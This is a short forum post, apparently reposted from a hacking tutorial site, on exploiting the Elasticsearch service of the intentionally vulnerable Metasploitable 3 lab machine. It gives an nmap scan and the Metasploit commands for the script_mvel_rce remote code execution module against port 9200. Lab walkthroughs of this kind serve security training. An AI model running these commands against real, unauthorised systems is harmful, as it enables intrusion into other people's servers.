• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Metasploitable 3 using Elasticsearch Exploit

DizzySuziLycan

Play-to-Earn Advocate
D Rep
0
0
0
Rep
0
D Vouches
0
0
0
Vouches
0
Posts
169
Likes
32
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.

nmap –p- -A 192.168.1.8

1.png


Nmap shows a splendid result and in that result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.

2.png


YES! We have an exploit for that. Let’s use it to our advantage.

3.png


To use this exploit go to Metasploit and type:

use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

4.png


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.
 

435,564

313,956

313,965

Top